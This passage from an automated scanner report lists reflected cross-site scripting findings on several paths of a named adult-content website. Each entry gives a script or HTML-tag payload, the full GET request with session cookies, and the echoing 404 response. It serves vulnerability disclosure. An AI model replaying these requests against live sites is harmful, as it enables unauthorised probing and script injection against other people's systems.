<p>The requested URL /adult/googlepr.php45489<script>alert(1)</script>234a8832dbb was not found on this server.</p>
...[SNIP]...

2.17. http://www.resellerbase.com/adult/googlepr.php [link_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload 16a39<a>74ee8bd7ee5 was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/googlepr.php?link_id=1416a39<a>74ee8bd7ee5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/googlepr.php?link_id=1416a39<a>74ee8bd7ee5 was not found on this server.</p>
...[SNIP]...

2.18. http://www.resellerbase.com/adult/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59375<script>alert(1)</script>7f947c6ef25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/googlepr.php?59375<script>alert(1)</script>7f947c6ef25=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/googlepr.php?59375<script>alert(1)</script>7f947c6ef25=1 was not found on this server.</p>
...[SNIP]...

2.19. http://www.resellerbase.com/adult/media-chat/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2e05f<script>alert(1)</script>4396f3d42da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult2e05f<script>alert(1)</script>4396f3d42da/media-chat/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult2e05f<script>alert(1)</script>4396f3d42da/media-chat/ was not found on this server.</p>
...[SNIP]...

2.20. http://www.resellerbase.com/adult/media-chat/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be556<script>alert(1)</script>4c10239d375a927cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adultbe556<script>alert(1)</script>4c10239d375a927cf/media-chat/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultbe556<script>alert(1)</script>4c10239d375a927cf/media-chat/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.21. http://www.resellerbase.com/adult/media-chat/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5b4a7<script>alert(1)</script>e2bfbb56669 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat5b4a7<script>alert(1)</script>e2bfbb56669/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat5b4a7<script>alert(1)</script>e2bfbb56669/ was not found on this server.</p>
...[SNIP]...

2.22. http://www.resellerbase.com/adult/media-chat/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4d351<script>alert(1)</script>709f7212f41f285e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/media-chat4d351<script>alert(1)</script>709f7212f41f285e5/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat4d351<script>alert(1)</script>709f7212f41f285e5/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.23. http://www.resellerbase.com/adult/media-chat/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6346e<script>alert(1)</script>090b8421ea5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/?6346e<script>alert(1)</script>090b8421ea5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/?6346e<script>alert(1)</script>090b8421ea5=1 was not found on this server.</p>
...[SNIP]...

2.24. http://www.resellerbase.com/adult/media-chat/ [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload a709d<a>3638cc1a55c was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fa709d<a>3638cc1a55c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:29:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fa709d<a>3638cc1a55c was not found on this server.</p>
...[SNIP]...

2.25. http://www.resellerbase.com/adult/media-chat/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1ff17<script>alert(1)</script>30f6defefd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult1ff17<script>alert(1)</script>30f6defefd5/media-chat/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult1ff17<script>alert(1)</script>30f6defefd5/media-chat/googlepr.php was not found on this server.</p>
...[SNIP]...

2.26. http://www.resellerbase.com/adult/media-chat/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 273a1<script>alert(1)</script>cc4c2e3f0a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat273a1<script>alert(1)</script>cc4c2e3f0a5/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat273a1<script>alert(1)</script>cc4c2e3f0a5/googlepr.php was not found on this server.</p>
...[SNIP]...

2.27. http://www.resellerbase.com/adult/media-chat/googlepr.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 81bab<script>alert(1)</script>23f70528fec was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/googlepr.php81bab<script>alert(1)</script>23f70528fec HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/googlepr.php81bab<script>alert(1)</script>23f70528fec was not found on this server.</p>
...[SNIP]...

2.28. http://www.resellerbase.com/adult/media-chat/googlepr.php [link_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload 1c46f<a>37bbf2e3769 was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/googlepr.php?link_id=311c46f<a>37bbf2e3769 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/googlepr.php?link_id=311c46f<a>37bbf2e3769 was not found on this server.</p>
...[SNIP]...

2.29. http://www.resellerbase.com/adult/media-chat/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 72606<script>alert(1)</script>e754d75196a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/googlepr.php?72606<script>alert(1)</script>e754d75196a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/googlepr.php?72606<script>alert(1)</script>e754d75196a=1 was not found on this server.</p>
...[SNIP]...

2.30. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/more2.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df005<script>alert(1)</script>84058bc8097266e56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adultdf005<script>alert(1)</script>84058bc8097266e56/media-chat/more2.html?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultdf005<script>alert(1)</script>84058bc8097266e56/media-chat/more2.html?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.31. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/more2.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d229a<script>alert(1)</script>0663d31a67b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultd229a<script>alert(1)</script>0663d31a67b/media-chat/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultd229a<script>alert(1)</script>0663d31a67b/media-chat/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f was not found on this server.</p>
...[SNIP]...

2.32. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/more2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab175<script>alert(1)</script>068e1ee4551 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chatab175<script>alert(1)</script>068e1ee4551/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chatab175<script>alert(1)</script>068e1ee4551/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f was not found on this server.</p>
...[SNIP]...

2.33. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/more2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f39f3<script>alert(1)</script>6c7404e2fc2cbc9e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/media-chatf39f3<script>alert(1)</script>6c7404e2fc2cbc9e3/more2.html?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chatf39f3<script>alert(1)</script>6c7404e2fc2cbc9e3/more2.html?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.34. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/more2.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ccee7<script>alert(1)</script>4892fe500c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/ccee7<script>alert(1)</script>4892fe500c3?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/ccee7<script>alert(1)</script>4892fe500c3?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f was not found on this server.</p>
...[SNIP]...

2.35. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/more2.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6a456<script>alert(1)</script>f799552621c47f5b8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/media-chat/6a456<script>alert(1)</script>f799552621c47f5b8?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

